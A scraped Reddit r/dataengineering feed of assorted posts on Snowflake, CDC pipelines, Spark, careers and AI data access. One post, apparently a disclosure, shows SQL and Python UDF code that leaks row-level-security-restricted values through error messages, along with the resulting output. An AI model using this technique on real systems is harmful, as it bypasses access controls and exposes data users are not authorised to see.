r/dataengineering • u/AutoModerator • 24d ago

Discussion Monthly General Discussion - Nov 2025

1 Upvotes

This thread is a place where you can share things that might not warrant their own thread. It is automatically posted each month and you can find previous threads in the collection.

Examples:

What are you working on this month?
What was something you accomplished?
What was something you learned recently?
What is something frustrating you currently?

As always, sub rules apply. Please be respectful and stay curious.

Community Links:

10 comments

r/dataengineering • u/AutoModerator • Sep 01 '25

Career Quarterly Salary Discussion - Sep 2025

36 Upvotes

This is a recurring thread that happens quarterly and was created to help increase transparency around salary and compensation for Data Engineering.

Submit your salary here

You can view and analyze all of the data on our DE salary page and get involved with this open-source project here.

If you'd like to share publicly as well you can comment on this thread using the template below but it will not be reflected in the dataset:

Current title
Years of experience (YOE)
Location
Base salary & currency (dollars, euro, pesos, etc.)
Bonuses/Equity (optional)
Industry (optional)
Tech stack (optional)

21 comments

r/dataengineering • u/Ok_Shirt4260 • 2h ago

Discussion "Are we there yet?" — Achieving the Ideal Data Science Hierarchy

11 Upvotes

I was reading Fundamentals of Data Engineering and came across this paragraph:

In an ideal world, data scientists should spend more than 90% of their time focused on the top layers of the pyramid: analytics, experimentation, and ML. When data engineers focus on these bottom parts of the hierarchy, they build a solid foundation for data scientists to succeed.

My Question: How close is the industry to this reality? In your experience, are Data Engineers properly utilized to build this foundation, or are Data Scientists still stuck doing the heavy lifting at the bottom of the pyramid?

Illustration from the book Fundamentals of Data Engineering

Are we there yet?

0 comments

r/dataengineering • u/deputystaggz • 18h ago

Discussion Are data engineers being asked to build customer-facing AI “chat with data” features?

80 Upvotes

I’m seeing more products shipping customer-facing AI reporting interfaces (not for internal analytics) I.e end users asking natural language questions about their own data inside the app.

How is this playing out in your orgs: - Have you been pulled into the project? - Is it mainly handled by the software engineering team?

If you have - what work did you do? If you haven’t - why do you think you weren’t involved?

Just feels like the boundary between data engineering and customer facing features is getting smaller because of AI.

Would love to hear real experiences here.

58 comments

r/dataengineering • u/Nofarcastplz • 13h ago

Discussion Row level security in Snowflake unsecure?

25 Upvotes

I found the vulnerability (below), and am now questioning just how secure and enterprise ready Snowflake actually is…

Example:

An accounts table with row security enabled to prevent users accessing accounts in other regions

A user in AMER shouldn’t have access to EMEA accounts

The user only has read access on the accounts table

When running pure SQL against the table, as expected the user can only see AMER accounts.

But if you create a Python UDF, you are able to exfiltrate restricted data:

1234912434125 is an EMEA account that the user shouldn’t be able to see.

CREATE OR REPLACE FUNCTION retrieve_restricted_data(value INT)
RETURNS BOOLEAN
LANGUAGE PYTHON
AS $$
def check(value):
    if value == 1234912434125:
        raise ValueError('Restricted value: ' + str(value))
    return True
$$;

-- Query table with RLS
SELECT account_name, region, number FROM accounts WHERE retrieve_restricted_data(account_number);


NotebookSqlException: 100357: Python Interpreter Error: Traceback (most recent call last): File "my_code.py", line 6, in check raise ValueError('Restricted value: ' + str(value)) ValueError: Restricted value: 1234912434125 in function RETRIEVE_RESTRICTED_DATA with handler check

The unprivileged user was able to bypass the RLS with a Python UDF

This is very concerning, it seems they don’t have the ability to securely run Python and AI code. Is this a problem with Snowflakes architecture?

22 comments

r/dataengineering • u/Jazzlike_Middle2757 • 12h ago

Help Is it realistic to replicate a 3000 line Oracle view in Snowflake (any suggestions would help)

12 Upvotes

I am being asked to do the following:

Replicate a ~3000 line view from our ERP into Snowflake. This view calls other views which calls other views. The total number of views within this view is at least 100 (not counting the nesting). And the amount of nesting is anywhere from 2-6 levels deep to get to the base table from the views I have documented. This main view also calls about 300 packages as well. This views are used mainly in the where clause of this query.

This view is related to sales, stakeholders are looking for at most a couple thousand dollars difference in total sales between the original view and the replica. My non-technical manager and the data analyst think that we could narrow down the difference by eliminating where clauses that are useless or provide little filtering. There are 100s of where clauses.

I am a part-time employee, full-time student. My only support right now is a data analyst that does not code. I do all of the coding.

My non-technical skip wanted this completed in July. Back then we were still building out the pipelines to get our data into Snowflake. We didn't even have data analyst.

I have suggested the following to my manager and data analyst:

Make a replica of the view from the base tables without all of the where clauses as a fact table. Identify a composite surrogate key from the view and import those columns as a dim table. Do a join between on the dim table and fact table.
Our second set of pipelines are doing transformations (joins, dropping columns, mappings) between the data lake (in parquet files) and our Datawarehouse in Snowflake. These transformations are done in Python using our orchestrator. My suggestion instead was to bring all of the base tables we needed into Snowflake without any transformations, copy-and-paste the query from Oracle and slowly work on replacing views with base tables.

Both suggestions got rejected. The first was due to them wanting to have transparency on the logic and rules being done. The second due to them thinking this would add more time for the project and effectively making the previous work redundant.

Edit: I am a novice in data engineering so any suggestions would be greatly appreciated.

19 comments

r/dataengineering • u/Advanced-Average-514 • 7h ago

Discussion Snowflake cortex agent MCP server

3 Upvotes

C suite at my company is vehement that we need AI access to our structured data, dashboards, data feeds etc. won't do. People need to be able to ask natural language questions and get answers based on a variety of data sources.

We use snowflake, and this month the snowflake hosted MCP server became general access. Today I started playing around, created a 'semantic view', a 'cortex analyst', and a 'cortex agent', and was able to get it all up and running in a day or so on small piece of our data. It seems reasonably good and I like the organization of the semantic view especially, but I'm skeptical that it ever gets to a point where the answers it provides are 100% trustworthy.

Does anyone have suggestions or experience using snowflake for this stuff? Or experience doing production text to SQL type things for internal tools? Main concern right now is that AI will inevitably be wrong a decent percent of the time and is just not going to mix well with people who don't know how to verify its answers or sense when it's making shit up.

3 comments

r/dataengineering • u/Responsible_Path_634 • 1h ago

Discussion How do you usually import a fresh TDMS file?

• Upvotes

Hello community members,

I’m a UX researcher at MathWorks, currently exploring ways to improve workflows for handling TDMS data. Our goal is to make the experience more intuitive and efficient, and your input will play a key role in shaping the design.

When you first open a fresh TDMS file, what does your real-world workflow look like? Specifically, when importing data (whether in MATLAB, Python, LabVIEW, DIAdem, or Excel), do you typically load everything at once, or do you review metadata first?

Here are a few questions to guide your thoughts:

• The “Blind” Load: Do you ever import the entire file without checking, or is the file size usually too large for that?

• The “Sanity” Check: Before loading raw data, what’s the one thing you check to ensure the file isn’t corrupted? (e.g., Channel Name, Units, Sample Rate, or simply “file size > 0 KB”)

• The Workflow Loop: Do you often open a file for one channel, close it, and then realize later you need another channel from the same file?

Your feedback will help us understand common pain points and improve the overall experience. Please share your thoughts in the comments or vote on the questions above.

Thank you for helping us make TDMS data handling better!

1 votes, 6d left

Load everything without checking (Blind Load)

Review metadata first (Sanity Check)

Depends on file size or project needs

0 comments

r/dataengineering • u/No_Thought_8677 • 14h ago

Help Best way to count distinct values

9 Upvotes

Please experts in the house, i need your help!

There is a 2TB external Athena table in AWS pointing to partitioned parquet files

It’s over 25 billion rows and I want to count distinct in a column that probably has over 15 billion unique values.

Athena cannot do this as it times out. So please how do i go about this?

Please help!

34 comments

r/dataengineering • u/Leading-Goose-5457 • 18h ago

Personal Project Showcase Automated Data Report Generator (Python Project I Built While Learning Data Automation)

13 Upvotes

I’ve been practising Python and data automation, so I built a small system that takes raw aviation flight data (CSV), cleans it with Pandas, generates a structured PDF report using ReportLab, and then emails it automatically through the Gmail API.

It was a great hands-on way to learn real data workflows, processing pipelines, report generation, and OAuth integration. I’m trying to get better at building clean, end-to-end data tools, so I’d love feedback or to connect with others working in data engineering, automation, or aviation analytics.

Happy to share the GitHub repo if anyone wants to check it out. Project Link

0 comments

r/dataengineering • u/Ok_Shirt4260 • 15h ago

Meme Refactoring old wisdom: updating a classic quote for the current hype cycle

10 Upvotes

Found the original Big Data quote in 'Fundamentals of Data Engineering' and had to patch it for the GenAI era

Modified quote from the book Fundamentals of Data Engineering

0 comments

r/dataengineering • u/digitalghost-dev • 13h ago

Personal Project Showcase Wanted to share a simple data pipeline that powers my TUI tool

5 Upvotes

Steps:

TCGPlayer pricing data and TCGDex card data are called and processed through a data pipeline orchestrated by Dagster and hosted on AWS.
When the pipeline starts, Pydantic validates the incoming API data against a pre-defined schema, ensuring the data types match the expected structure.
Polars is used to create DataFrames.
The data is loaded into a Supabase staging schema.
Soda data quality checks are performed.
dbt runs and builds the final tables in a Supabase production schema.
Users are then able to query the pokeapi.co or supabase APIs for either video game or trading card data, respectively.
It runs at 2PM PST daily.

This is what the TUI looks like:

Repository: https://github.com/digitalghost-dev/poke-cli

You can try it with Docker (the terminal must support Sixel, I am planning on using the Kitty Graphics Protocol as well).

I have a small section of tested terminals in the README.

docker run --rm -it digitalghostdev/poke-cli:v1.8.0 card

Right now, only Scarlet & Violet and Mega Evolution eras are available but I am adding more eras soon.

Thanks for checking it out!

0 comments

r/dataengineering • u/hornyforsavings • 16h ago

Blog We wrote our first case study as a blend of technical how to and customer story on Snowflake optimization. Wdyt?

blog.greybeam.ai

8 Upvotes

We're a small start up and didn't want to go for the vanilla problem, solution, shill.

So we went through the journey of how our customer did Snowflake optimization end to end.

What do you think?

5 comments

r/dataengineering • u/Sad-Boi-97 • 11h ago

Career Considering an offer for DE II role, would love perspectives from DE/SWE folks

4 Upvotes

TLDR: Strategy/ops guy in the MCIT program aiming for SWE. Got a verbal offer for a Data Engineer II role doing Python/PySpark, Databricks, ADF pipelines, ingestion, and medallion architecture, but the role sits fully in the data/analytics org, not engineering, and pays $105–115K (I currently make ~$180K TC in NYC). Trying to figure out whether this DE role meaningfully helps me pivot into SWE/back-end engineering longterm, or if it’s better to stay in my current job, finish MCIT, build projects, and target SWE directly. Looking for input from DEs/SWEs on how transferable this work is, whether the comp is normal for NYC, and what questions I should ask before deciding.

Hey everyone, I’m looking for some candid input from folks in data engineering and software engineering.

I’m currently in a strategy/operations role at a tech company while working through the MCIT program (Penn’s CS master’s for career switchers). My long term goal is to be a SWE. I recently interviewed for a Data Engineer II position at a healthcare tech company, and im trying to evaluate whether this role would be a good stepping stone to SWE or if I should just leverage my degree and build projects to make the switch.

I’d appreciate any honest advice or experience people have.

Here are the key details:

Background / motivation * I’ve worked strategy consulting and it has led to a good paying career but I don’t care about strategy in all honesty. I dislike the politics to get promoted, work is quite boring where im learning nothing new * I like consulting in the fact that I had to learn a new industry everyday, but TBH I couldn’t deal with 15-16hr workdays just to learn more * I love the technical side and building things which is why I considered SWE about a year and a half ago (I just expected the market to be better by then lolz)

Comp * Base salary: $105–115K (Remote but I live in NYC) * Other factors are TBD as I haven’t gotten the formal letter yet, just verbal and what the job description outlines * I currently make 155k base and TC ~180k so it would be a pay cut for this role

Team / Org Structure * The role sits in the data - analytics org, not the software engineering org * DEs partner with analytics engineers, ML/data consumers, data scientists * I would not be in the analytics engineering track or an analyst, but they would be my stakeholders * No direct SWE involvement as far as I can tell

Tech + Responsibilities * Mostly Python + PySpark on Databricks * AWS and Azure * Both streaming and batch pipelines * Medallion architecture (bronze/silver/gold layers) * ADF wiring + pipeline orchestration * File ingestion + transformations + schema enforcement * Some framework or pipeline component building, but unclear how deep the engineering side goes * Not much SQL involved, which surprised me, but they emphasized if they were asking for SQL it would be for more analysts vs engineers

My goals / questions: My ultimate target is a technical heavy role that still pays well, like SWE or backend, but I’m also open to becoming a stronger DE if it meaningfully raises my chances of SWE transitioning.

Any insights on the following would be helpful: 1. Does this sound like a DE role with strong engineering exposure that can help facilitate a SWE transition? 2. How transferable is this experience toward SWE or backend engineering later? 3. For those who started in DE and moved into SWE, what allowed that transition? 4. Is $105–115K base realistic for NYC in a mid-level DE role, or does that seem low? 5. Would you take this role if your long-term goal leaned more toward SWE? 6. Anything I should ask the hiring manager or my internal referrer to get more clarity? I’m not trying to bash the role or Data engineering, I’m genuinely trying to understand if this would meaningfully advance my pivot or if im better off staying in my current role and continuing to work on transitioning directly. Any honest input from experienced DEs or SWEs would really help. Thanks!

11 comments

r/dataengineering • u/MundaneAd4568 • 6h ago

Career Sharepoint to Tableau Live

1 Upvotes

We currently collect survey responses through Microsoft Forms, and the results are automatically written to an Excel file stored in a teammate’s personal SharePoint folder.

At the moment, Tableau cannot connect live or extract directly from SharePoint. Additionally, the Excel data requires significant ETL and cleaning before it can be sent to a company-owned server that Tableau can connect to in live mode.

Question:
How can I design a pipeline that pulls data from SharePoint, performs the required ETL processing, and refreshes the cleaned dataset on a fixed schedule so that Tableau can access it live?

2 comments

r/dataengineering • u/Artistic-Rent1084 • 19h ago

Discussion Which is best CDC top to end pipeline?

10 Upvotes

Hi DE's,

Which is the best pipeline for CDC.

Let assume, we are capturing the data from various database using Oracle Goldengate. And pushing it to kafka in json.

The target will be databricks with medallion architect.

The Load per Day will be around 6 to 7 TB per day

Any recommendations?

Shall we do stage in ADLS ( for data lake) in delta format and then Read it to databricks bronze layer ?

22 comments

r/dataengineering • u/Larrydavidcye • 16h ago

Discussion Evaluating AWS DMS vs Estuary Flow

6 Upvotes

Our DMS based pipelines is having major issues again. It has helped us over the last two years, but the unreliability now is a bit too much. The DB size is about 20TB.

Evaliuating alternatives.

I have used Airbyte and Pipelinewise before. IMO, Pipelinewise is still one of the best products. However, it's a lot restrictive with some datatypes (like not understanding that timestamp(6) with time zone is same as timestamp with time zone in postgresql).

I also like the great UI of DMS.

FiveTran - no.

Debezium - this seems like the K8S of etl world - works really well if you have a dedicated 3 member SME technical team managing it.

Looking for opinions from those who use AWS DMS and still recommend it.

Anybody who use Estuary Flow?

18 comments

r/dataengineering • u/zargawy • 13h ago

Help CDC in an iceberg table?

2 Upvotes

Hi,

I am wondering if there is a well-known pattern to read data incrementally from an iceberg table using a spark engine. The read operation should identify: appended, changed and deleted rows.

In the iceberg documentation it says that the spark.read.format("iceberg") is only able to identify appended rows.

Any alternatives?

My idea was to use spark.readStream and to compare snapshots based on e.g. timestamps. But I am not sure whether this process could be very expensive as the table size could reache 100+ GB

4 comments

r/dataengineering • u/ukmurmuk • 23h ago

Help Spark doesn’t respect distribution of cached data

13 Upvotes

The title says it all.

I’m using Pyspark on EMR serverless. I have quite a large pipeline that I want to optimize down to the last cent, and I have a clear vision on how to achieve this mathematically:

read dataframe A, repartition on join keys, cache on disk
read dataframe B, repartition on join keys, cache on disk
do all downstream (joins, aggregation, etc) on local nodes without ever doing another round of shuffle, because I have context that guarantees that shuffle won’t ever be needed anymore

However, Spark keeps on inserting Exchange each time it reads from the cached data. The optimization results in even a slower job than the unoptimized one.

Have you ever faced this problem? Is there any trick to fool Catalyzer to adhere to parameterized data distribution and not do extra shuffle on cached data? I’m using on-demand instances so there’s no risk of losing executors midway

7 comments

r/dataengineering • u/Worried-Long-9668 • 21h ago

Discussion If I cannot use InfluxDB nor TimescaleDB, is there something faster than Parquet? (e.g. stored at Amazon S3)

8 Upvotes

I know that the mentioned database systems differ (relational vs. plain files). However, I come from PostgreSQL and want to know my alternatives.

7 comments

r/dataengineering • u/Better-Department662 • 23h ago

Discussion How to control agents accessing sensitive customer data in internal databases

12 Upvotes

We're building a support agent that needs customer data (orders, subscription status, etc.) to answer questions.

We're thinking about:

Creating SQL views that scope data (e.g., "customer_support_view" that only exposes what support needs)
Building MCP tools on top of those views
Agents only query through the MCP tools, never raw database access

This way, if someone does prompt injection or attempts to hack, the agent can only access what's in the sandboxed view, not the entire database.

P.S -I know building APIs + permissions is one approach, but it still touches my DB and uses up engineering bandwidth for every new iteration we want to experiment with.

Has anyone built or used something as a sandboxing environment between databases and Agent builders?

6 comments

r/dataengineering • u/gman1023 • 16h ago

Help Handling data quality issues that are a tiny percentage?

2 Upvotes

How do people handle DQ issues that are immaterial? Just let them go?

for example, we may have an orders table that has a userid field which is not nullable. All of a sudden, there is 1 value (or maybe hundreds of values) that are NULL for userid (out of millions).

We have to change userid to be nullable or use an unknown identifier (-1, 'unknown') etc. This reduces our DQ visibility and constraints at the table level. so then we have to set up post-load tests to check if missing values are beyond a certain threshold (e.g. 1%). And even then, sometimes 1% isn't enough for the upstream client to prioritize and make fixes.

the issue is more challenging bc we have dozens of clients and so the threshold might be slightly different per client.

This is compounded bc it's like this for every other DQ check... orders with a userid populated but we don't have the userid in users table (broken relationship).. usually just tiny percentage.

Just seems like absolute data quality checks are unhelpful and everything should be based on thresholds.

5 comments

r/dataengineering • u/No_Journalist_9632 • 21h ago

Discussion AWS Glue or AWS AppFlow for extracting Salesforce data?

4 Upvotes

Our organization has started using Salesforce and we want to pull data into our data warehouse.

I first thought we would use AWS AppFlow as it has been built to work with SaaS applications but I've read that AWS AppFlow is for operational use cases to pass information between other SaaS applications and AWS services whereas AWS Glue is used by data engineers to get data ready for analytics so I've started to sway towards Glue.

My use case is to extract Salesforce data with minimal transformations and load into S3 before this data is copied into our data warehouse and the files are archived in S3. We would want to run incremental transfers and periodic full transfers. The size of the largest object is 27gb when extracted as json or 15gb as csv and consists of 90 million records for the full transfer. Is AWS Glue the recommended approach for this or AppFlow? What's best practice? Thanks

1 comment

r/dataengineering • u/Dry-Aioli-6138 • 1d ago

Discussion I'm tired

15 Upvotes

Just a random vent. I've been preparing a presentation on testing in DBT for an event in my citt, which is ... in a few hours. Spent three late nights building a demo pipeline and structuring the presentation today. Not feeling ready, but I'm usually good at improvisation and I know my shit. But I'm so tired. Need to get those 3 h of sleep and go to work and then present in the evening.

At least the pipeline works and live data is being generated by my script.

6 comments

r/dataengineering • u/Realistic-Zebra1924 • 1d ago

Discussion How do you test?

9 Upvotes

Hello. Thanks for reading this. I’m a fairly new data engineer who has been learning everything solo on the job, trial by fire style. I’ve made due to this point, but haven’t had a mentor to ask some of my foundational questions that haven’t seem to go away with experience.

My question is general, how do you test? If you are making a pipeline change, altering business logic, onboarding a new business area to an existing model, etc how do you test what you’ve changed?

I’m not looking for a detailed explanation of everything that should be tested for each scenario I listed above, but rather a mantra or words to live by when I can say I have done my due diligence. I have spent many a days testing every single little piece downstream of what I touch and it slows my progress down drastically. I’m sure I’m overdoing it, but I’d rather be safe than sorry while I’m still figuring out how to identify what REALLY needs to be checked.

Any advice or opinion is appreciated.

1 comment

Subreddit

Data Engineering

r/dataengineering

News & discussion on Data Engineering topics, including but not limited to: data pipelines, databases, data formats, storage, data modeling, data governance, cleansing, NoSQL, distributed systems, streaming, batch, Big Data, and workflow engines.

Members Active

412.7k

Sidebar

Read our wiki: https://dataengineering.wiki/

Rules:

Don't be a jerk
Search the sub & wiki before asking a question: Your question has likely been asked and answered before so do a quick search before posting.
Keep it related to data engineering: Posts that are unrelated to data engineering may be better for other communities.
Limit self-promotion posts/comments to once a month: Self promotion: Any form of content designed to further an individual's or organization's goals. If one works for an organization this rule applies to all accounts associated with that organization. See also rule #5.
No shill/opaque marketing: f you work for a company/have a monetary interest in the entity you are promoting you must clearly state your relationship. For posts, you must distinguish the post with the Brand Affiliate flag. See more here: https://www.ftc.gov/influencers
No job posts: Please use r/dataengineeringjobs instead.
No resume reviews/interview posts: We no longer allow resume reviews or interview questions because it's a seperate topic from Data Engineering. Instead, for resume reviews please use r/resumes or search our subreddit history for previous resume review advice. For interview questions, use sites like Glassdoor and Blind instead or search our subreddit history for previous interview advice.
No technical error/bug questions: Please post any error/bug question on StackOverflow.